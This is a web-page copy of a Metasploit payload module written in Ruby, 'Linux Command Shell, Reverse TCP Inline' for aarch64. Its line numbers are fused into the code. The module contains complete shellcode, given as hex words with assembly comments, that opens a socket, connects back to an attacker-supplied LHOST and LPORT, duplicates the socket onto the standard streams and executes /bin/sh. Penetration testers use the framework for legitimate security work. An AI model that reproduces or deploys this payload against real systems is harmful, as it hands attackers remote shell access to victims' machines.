Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb
Views: 11782
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##456module MetasploitModule78CachedSize = 152910include Msf::Payload::Single11include Msf::Payload::Linux12include Msf::Sessions::CommandShellOptions1314def initialize(info = {})15super(merge_info(info,16'Name' => 'Linux Command Shell, Reverse TCP Inline',17'Description' => 'Connect back to attacker and spawn a command shell',18'License' => MSF_LICENSE,19'Platform' => 'linux',20'Arch' => ARCH_AARCH64,21'Handler' => Msf::Handler::ReverseTcp,22'Session' => Msf::Sessions::CommandShellUnix,23'Payload' =>24{25'Offsets' =>26{27'LHOST' => [ 132, 'ADDR' ],28'LPORT' => [ 130, 'n' ],29},30'Payload' =>31[32# Generated from external/source/shellcode/linux/aarch64/single_reverse_tcp_shell.s330xd2800040, # mov x0, #0x2 // #2340xd2800021, # mov x1, #0x1 // #1350xd2800002, # mov x2, #0x0 // #0360xd28018c8, # mov x8, #0xc6 // #198370xd4000001, # svc #0x0380xaa0003e3, # mov x3, x0390x10000341, # adr x1, 80 <sockaddr>400xd2800202, # mov x2, #0x10 // #16410xd2801968, # mov x8, #0xcb // #203420xd4000001, # svc #0x0430x35000260, # cbnz w0, 74 <exit>440xaa0303e0, # mov x0, x3450xd2800002, # mov x2, #0x0 // #0460xd2800001, # mov x1, #0x0 // #0470xd2800308, # mov x8, #0x18 // #24480xd4000001, # svc #0x0490xd2800021, # mov x1, #0x1 // #1500xd2800308, # mov x8, #0x18 // #24510xd4000001, # svc #0x0520xd2800041, # mov x1, #0x2 // #2530xd2800308, # mov x8, #0x18 // #24540xd4000001, # svc #0x0550x10000180, # adr x0, 88 <shell>560xd2800002, # mov x2, #0x0 // #0570xf90003e0, # str x0, [sp]580xf90007e2, # str x2, [sp,#8]590x910003e1, # mov x1, sp600xd2801ba8, # mov x8, #0xdd // #221610xd4000001, # svc #0x0620xd2800000, # mov x0, #0x0 // #0630xd2800ba8, # mov x8, #0x5d // #93640xd4000001, # svc #0x0650x5c110002, # .word 0x5c110002660x0100007f, # .word 0x0100007f670x00000000, # .word 0x00000000 // shell680x00000000, # .word 0x00000000690x00000000, # .word 0x00000000700x00000000, # .word 0x0000000071].pack("V*")72}73))7475# Register command execution options76register_options(77[78OptString.new('SHELL', [ true, "The shell to execute.", "/bin/sh" ]),79])80end8182def generate(_opts = {})83p = super8485sh = datastore['SHELL']86if sh.length >= 1687raise ArgumentError, "The specified shell must be less than 16 bytes."88end89p[136, sh.length] = sh9091p92end93end949596